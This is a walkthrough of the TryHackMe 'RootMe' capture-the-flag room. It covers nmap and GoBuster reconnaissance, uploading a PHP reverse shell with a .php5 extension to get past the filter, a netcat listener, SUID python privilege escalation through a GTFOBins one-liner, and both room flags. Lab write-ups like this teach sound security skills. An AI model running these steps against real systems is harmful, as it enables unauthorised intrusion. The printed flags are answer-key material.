RootMe Capture the Flag walk through

RootMe is a vulnerable machine created by reddyyZ on TryHackMe practice room and is meant to test skills like: nmap, GoBuster, privilege escalation, SUID, find webshell and GTFOBins.

You can access it by clicking in the link below:

RootMe on TryHackMe Official Website

In order to solve this easy room, there are some requirements and tasks to complete, let's have a look on them!


Tasks

Task 1: Deploy the Machine

A very simple task. In this first one we just need to run the machine in order to be able to access it through its IP (Internet Protocol).

Task 2: Reconnaissance

Here it's where the hacking really begins! Now we got a some more questions to solve to get to the next task.

In order to get the proper answer to these questions, we'll have to use nmap and GoBuster

Task 3: Getting a Shell

Now we need to find a form to upload an exploit and get a reverse-shell running on the target system. Then we'll explore it and look for a flag on the system

To find a way to hack the system, we need to analize all the resouces that we have, then start to test it and look for vulnerable places to attack.

Task 4: Privilege Escalation

Now that we got a shell, we need to find a way to become root. To do that, we are going to look for SUID files trying to find anything out of its place.


Steps

  1. Scan the machine using nmap:

    2. Type: nmap -sC -sV <IP_Address>

  2. Using -sC we are scanning with the nmap default scripts.

  3. Using -sV we are getting more information about the open ports in the target machine.
nmap's scan result

Now the first three questions can be answered properly:

  • How many ports are open?
    • 2
  • What version of Apache is running?
    • 2.4.29
  • What service is running on port 22?
    • SSH
  1. Run GoBuster to look for files and directories on the web server.

    2. Type: gobuster dir -u http://<IP_Address> -w <wordlist>.txt

  2. dir is used in order for gobuster to look for directories and enter the brute-force mode.
  3. -u can be used to pass a URL.
  4. -w can be used to specify a wordlist.
GoBuster result

Based on the result above, one important question can be responded.

  • What is the hidden directory?
    • /panel/
  1. Visit the hidden directory that we just found

    2. Always remember to use the web server IP address or URL.

Secret page

Looks like in the hidden directory we can upload a file to the web server. Then, we can totally take this as an advantage and try to upload a malicius file to it.

  1. Now we need to upload a web shell in order to the get a reverse-shell running on the target system.

    2. If you are using Kali Linux, it comes with all the tool we need to solve the CTF, including a php reverse-shell. To access it, navigate to /usr/share/webshells/php
    and look for php-reverse-shell.php.

    Otherwise, you can download it here

    Now that we got everything we need, it's time to change all the values on the php script in order to get our communication with the machine. To do that, just edit this values shown below. (You can use gedit or nano for it.)

Editing the php script
Edit the IP and PORT variables
  1. Now, go back to the Website and upload the php script to the server.

    2. You should get an error! No worries, this is a file upload security solution that blocks archives that may break the server. To bypass this restriction, change the file extension to php5
    Note that there are other types of file upload restrictions and most of the time a simple extension change will not do it.

Hidden page error

You can check the files on the server by accesing <IP_Address>/uploads/

Uploads page
  1. Now that we got the reverse-shell on the target machine, we just need to start a netcat listener on the port that we configured eirlier.

    2. Type: sudo nc -lvpn 9999

NetCat Listener

With NetCat running, we just need to execute the php script on the target machine. To do that, we need to access its location.

One way of doing so is use the curl tool and make a http request on the webpage. Just type: curl http://<IP_Address>/uploads/reverse-shell.php5

Http request using curl
  1. Go back and check if we got a connection on the listener.
Getting a shell
Yup! We got a shell!
  1. In order to answer the next question, we need to explore the system looking for a file named user.txt. To do that, we should use the Linux Find tool.

    2. Type: find / -type f -name user.txt 2> /dev/null

    • -type f is used to look for files.
    • -name can be used to pass a filename.
    • 2> /dev/null can be used to send the error messages.
Using Find
  1. Retrieve the content of user.txt.

    2. Type: cat /var/www/user.txt
    Now we can answer one more question:

  • What is user.txt?
    • THM{y0u_g0t_a_sh3ll}
  1. To solve the next Task, we need to find strange files with SUID permissions and see if it can be explored and escalate our privilege.

    2. To do this, type: find / type -f -user root -perm -u=s 2> /dev/null

SUID search
The blurred path is the one out of place

Now we can answer one more question:

  • Which file from the SUID list is weird?
    • /usr/bin/python
  1. We just found a huge vulnerability on the target machine's OS. In order to exploit it, we can look up for specific binaries onto GTFOBins website.
SUID Binary in GTFOBins' site
  1. Now that we have everything we need to escalate our privilege, just execute the folowing command to get the root shell.

    2. Type: python3 -c ‘import os; os.execl(“/bin/sh”, “sh”, “-p”)’

Getting super user privileges
Now we're root!
  1. To find the root's flag, we need to use the find command again.

    2. Type: find / -type f -name root.txt

Super user flag location
root flag location
  1. Retrieve content of root.txt using the cat command.

    2. Type: cat /root/root.txt

Super user flag
root flag!

And now, finally, we can answer the final question:

  • What's the flag from the root.txt archive?
    • THM{pri1v1l3g3_3sc4l4t10n}
Room
Images